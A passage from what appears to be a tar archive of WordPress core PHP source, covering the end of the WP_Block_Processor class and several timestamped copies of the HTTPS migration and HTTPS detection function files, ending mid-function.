* @since 6.9.0
*
* @see self::is_block_type()
*
* @param string[] $block_type Optional. Is the matched block type one of these?
* If none are provided, will not test block type.
* @return bool Whether the matched block delimiter opens a block, and whether it
* opens a block of one of the given block types, if provided.
*/
public function opens_block( string ...$block_type ): bool {
// HTML spans only open implicit freeform content at the top level.
if ( self::HTML_SPAN === $this->state && 1 !== count( $this->open_blocks_at ) ) {
return false;
}
/*
* Because HTML spans are discovered after the next delimiter is found,
* the delimiter type when visiting HTML spans refers to the type of the
* following delimiter. Therefore the HTML case is handled by checking
* the state and depth of the stack of open block.
*/
if ( self::CLOSER === $this->type && ! $this->is_html() ) {
return false;
}
if ( count( $block_type ) === 0 ) {
return true;
}
foreach ( $block_type as $block ) {
if ( $this->is_block_type( $block ) ) {
return true;
}
}
return false;
}
/**
* Indicates if the matched delimiter is an HTML span.
*
* @since 6.9.0
*
* @see self::is_non_whitespace_html()
*
* @return bool Whether the processor is matched on an HTML span.
*/
public function is_html(): bool {
return self::HTML_SPAN === $this->state;
}
/**
* Indicates if the matched delimiter is an HTML span and comprises more
* than whitespace characters, i.e. contains real content.
*
* Many block serializers introduce newlines between block delimiters,
* so the presence of top-level non-block content does not imply that
* there are “real” freeform HTML blocks. Checking if there is content
* beyond whitespace is a more certain check, such as for determining
* whether to load CSS for the freeform or fallback block type.
*
* @since 6.9.0
*
* @see self::is_html()
*
* @return bool Whether the currently-matched delimiter is an HTML
* span containing non-whitespace text.
*/
public function is_non_whitespace_html(): bool {
if ( ! $this->is_html() ) {
return false;
}
$length = $this->matched_delimiter_at - $this->after_previous_delimiter;
$whitespace_length = strspn(
$this->source_text,
" \t\f\r\n",
$this->after_previous_delimiter,
$length
);
return $whitespace_length !== $length;
}
/**
* Returns the string content of a matched HTML span, or `null` otherwise.
*
* @since 6.9.0
*
* @return string|null Raw HTML content, or `null` if not currently matched on HTML.
*/
public function get_html_content(): ?string {
if ( ! $this->is_html() ) {
return null;
}
return substr(
$this->source_text,
$this->after_previous_delimiter,
$this->matched_delimiter_at - $this->after_previous_delimiter
);
}
/**
* Allocates a substring for the block type and returns the fully-qualified
* name, including the namespace, if matched on a delimiter, otherwise `null`.
*
* This function is like {@see self::get_printable_block_type()} but when
* paused on a freeform HTML block, will return `null` instead of “core/freeform”.
* The `null` behavior matches what {@see \parse_blocks()} returns but may not
* be as useful as having a string value.
*
* This function allocates a substring for the given block type. This
* allocation will be small and likely fine in most cases, but it's
* preferable to call {@see self::is_block_type()} if only needing
* to know whether the delimiter is for a given block type, as that
* function is more efficient for this purpose and avoids the allocation.
*
* Example:
*
* // Avoid.
* 'core/paragraph' = $processor->get_block_type();
*
* // Prefer.
* $processor->is_block_type( 'core/paragraph' );
* $processor->is_block_type( 'paragraph' );
* $processor->is_block_type( 'core/freeform' );
*
* // Freeform HTML content has no block type.
* $processor = new WP_Block_Processor( 'non-block content' );
* $processor->next_token();
* null === $processor->get_block_type();
*
* @since 6.9.0
*
* @see self::are_equal_block_types()
*
* @return string|null Fully-qualified block namespace and type, e.g. "core/paragraph",
* if matched on an explicit delimiter, otherwise `null`.
*/
public function get_block_type(): ?string {
if (
self::READY === $this->state ||
self::COMPLETE === $this->state ||
self::INCOMPLETE_INPUT === $this->state
) {
return null;
}
// This is a core/freeform text block, it’s special.
if ( $this->is_html() ) {
return null;
}
$block_type = substr( $this->source_text, $this->namespace_at, $this->name_at - $this->namespace_at + $this->name_length );
return self::normalize_block_type( $block_type );
}
/**
* Allocates a printable substring for the block type and returns the fully-qualified
* name, including the namespace, if matched on a delimiter or freeform block, otherwise `null`.
*
* This function is like {@see self::get_block_type()} but when paused on a freeform
* HTML block, will return “core/freeform” instead of `null`. The `null` behavior matches
* what {@see \parse_blocks()} returns but may not be as useful as having a string value.
*
* This function allocates a substring for the given block type. This
* allocation will be small and likely fine in most cases, but it's
* preferable to call {@see self::is_block_type()} if only needing
* to know whether the delimiter is for a given block type, as that
* function is more efficient for this purpose and avoids the allocation.
*
* Example:
*
* // Avoid.
* 'core/paragraph' = $processor->get_printable_block_type();
*
* // Prefer.
* $processor->is_block_type( 'core/paragraph' );
* $processor->is_block_type( 'paragraph' );
* $processor->is_block_type( 'core/freeform' );
*
* // Freeform HTML content is given an implicit type.
* $processor = new WP_Block_Processor( 'non-block content' );
* $processor->next_token();
* 'core/freeform' === $processor->get_printable_block_type();
*
* @since 6.9.0
*
* @see self::are_equal_block_types()
*
* @return string|null Fully-qualified block namespace and type, e.g. "core/paragraph",
* if matched on an explicit delimiter or freeform block, otherwise `null`.
*/
public function get_printable_block_type(): ?string {
if (
self::READY === $this->state ||
self::COMPLETE === $this->state ||
self::INCOMPLETE_INPUT === $this->state
) {
return null;
}
// This is a core/freeform text block, it’s special.
if ( $this->is_html() ) {
return 1 === count( $this->open_blocks_at )
? 'core/freeform'
: '#innerHTML';
}
$block_type = substr( $this->source_text, $this->namespace_at, $this->name_at - $this->namespace_at + $this->name_length );
return self::normalize_block_type( $block_type );
}
/**
* Normalizes a block name to ensure that missing implicit “core” namespaces are present.
*
* Example:
*
* 'core/paragraph' === WP_Block_Processor::normalize_block_byte( 'paragraph' );
* 'core/paragraph' === WP_Block_Processor::normalize_block_byte( 'core/paragraph' );
* 'my/paragraph' === WP_Block_Processor::normalize_block_byte( 'my/paragraph' );
*
* @since 6.9.0
*
* @param string $block_type Valid block name, potentially without a namespace.
* @return string Fully-qualified block type including namespace.
*/
public static function normalize_block_type( string $block_type ): string {
return false === strpos( $block_type, '/' )
? "core/{$block_type}"
: $block_type;
}
/**
* Returns a lazy wrapper around the block attributes, which can be used
* for efficiently interacting with the JSON attributes.
*
* This stub hints that there should be a lazy interface for parsing
* block attributes but doesn’t define it. It serves both as a placeholder
* for one to come as well as a guard against implementing an eager
* function in its place.
*
* @throws Exception This function is a stub for subclasses to implement
* when providing streaming attribute parsing.
*
* @since 6.9.0
*
* @see self::allocate_and_return_parsed_attributes()
*
* @return never
*/
public function get_attributes() {
throw new Exception( 'Lazy attribute parsing not yet supported' );
}
/**
* Attempts to parse and return the entire JSON attributes from the delimiter,
* allocating memory and processing the JSON span in the process.
*
* This does not return any parsed attributes for a closing block delimiter
* even if there is a span of JSON content; this JSON is a parsing error.
*
* Consider calling {@see static::get_attributes()} instead if it's not
* necessary to read all the attributes at the same time, as that provides
* a more efficient mechanism for typical use cases.
*
* Since the JSON span inside the comment delimiter may not be valid JSON,
* this function will return `null` if it cannot parse the span and set the
* {@see static::get_last_json_error()} to the appropriate JSON_ERROR_ constant.
*
* If the delimiter contains no JSON span, it will also return `null`,
* but the last error will be set to {@see \JSON_ERROR_NONE}.
*
* Example:
*
* $processor = new WP_Block_Processor( '<!-- wp:image {"url": "https://wordpress.org/favicon.ico"} -->' );
* $processor->next_delimiter();
* $memory_hungry_and_slow_attributes = $processor->allocate_and_return_parsed_attributes();
* $memory_hungry_and_slow_attributes === array( 'url' => 'https://wordpress.org/favicon.ico' );
*
* $processor = new WP_Block_Processor( '<!-- /wp:image {"url": "https://wordpress.org/favicon.ico"} -->' );
* $processor->next_delimiter();
* null = $processor->allocate_and_return_parsed_attributes();
* JSON_ERROR_NONE = $processor->get_last_json_error();
*
* $processor = new WP_Block_Processor( '<!-- wp:separator {} /-->' );
* $processor->next_delimiter();
* array() === $processor->allocate_and_return_parsed_attributes();
*
* $processor = new WP_Block_Processor( '<!-- wp:separator /-->' );
* $processor->next_delimiter();
* null = $processor->allocate_and_return_parsed_attributes();
*
* $processor = new WP_Block_Processor( '<!-- wp:image {"url} -->' );
* $processor->next_delimiter();
* null = $processor->allocate_and_return_parsed_attributes();
* JSON_ERROR_CTRL_CHAR = $processor->get_last_json_error();
*
* @since 6.9.0
*
* @return array|null Parsed JSON attributes, if present and valid, otherwise `null`.
*/
public function allocate_and_return_parsed_attributes(): ?array {
$this->last_json_error = JSON_ERROR_NONE;
if ( self::CLOSER === $this->type || $this->is_html() || 0 === $this->json_length ) {
return null;
}
$json_span = substr( $this->source_text, $this->json_at, $this->json_length );
$parsed = json_decode( $json_span, null, 512, JSON_OBJECT_AS_ARRAY | JSON_INVALID_UTF8_SUBSTITUTE );
$last_error = json_last_error();
$this->last_json_error = $last_error;
return ( JSON_ERROR_NONE === $last_error && is_array( $parsed ) )
? $parsed
: null;
}
/**
* Returns the span representing the currently-matched delimiter, if matched, otherwise `null`.
*
* Example:
*
* $processor = new WP_Block_Processor( '<!-- wp:void /-->' );
* null === $processor->get_span();
*
* $processor->next_delimiter();
* WP_HTML_Span( 0, 17 ) === $processor->get_span();
*
* @since 6.9.0
*
* @return WP_HTML_Span|null Span of text in source text spanning matched delimiter.
*/
public function get_span(): ?WP_HTML_Span {
switch ( $this->state ) {
case self::HTML_SPAN:
return new WP_HTML_Span( $this->after_previous_delimiter, $this->matched_delimiter_at - $this->after_previous_delimiter );
case self::MATCHED:
return new WP_HTML_Span( $this->matched_delimiter_at, $this->matched_delimiter_length );
default:
return null;
}
}
//
// Constant declarations that would otherwise pollute the top of the class.
//
/**
* Indicates that the block comment delimiter closes an open block.
*
* @see self::$type
*
* @since 6.9.0
*/
const CLOSER = 'closer';
/**
* Indicates that the block comment delimiter opens a block.
*
* @see self::$type
*
* @since 6.9.0
*/
const OPENER = 'opener';
/**
* Indicates that the block comment delimiter represents a void block
* with no inner content of any kind.
*
* @see self::$type
*
* @since 6.9.0
*/
const VOID = 'void';
/**
* Indicates that the processor is ready to start parsing but hasn’t yet begun.
*
* @see self::$state
*
* @since 6.9.0
*/
const READY = 'processor-ready';
/**
* Indicates that the processor is matched on an explicit block delimiter.
*
* @see self::$state
*
* @since 6.9.0
*/
const MATCHED = 'processor-matched';
/**
* Indicates that the processor is matched on the opening of an implicit freeform delimiter.
*
* @see self::$state
*
* @since 6.9.0
*/
const HTML_SPAN = 'processor-html-span';
/**
* Indicates that the parser started parsing a block comment delimiter, but
* the input document ended before it could finish. The document was likely truncated.
*
* @see self::$state
*
* @since 6.9.0
*/
const INCOMPLETE_INPUT = 'incomplete-input';
/**
* Indicates that the processor has finished parsing and has nothing left to scan.
*
* @see self::$state
*
* @since 6.9.0
*/
const COMPLETE = 'processor-complete';
}
https-migration-20260605172929-20260621081210-20260621133505.php 0000666 00000011205 15224151221 0014741 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605104303-20260621203023.php 0000666 00000013341 15224151221 0013323 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605070331-20260621081108.php 0000666 00000011205 15224151221 0013346 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605091832-20260621180252.php 0000666 00000013341 15224151221 0013347 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605114255-20260621081205.php 0000666 00000013341 15224151221 0013340 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
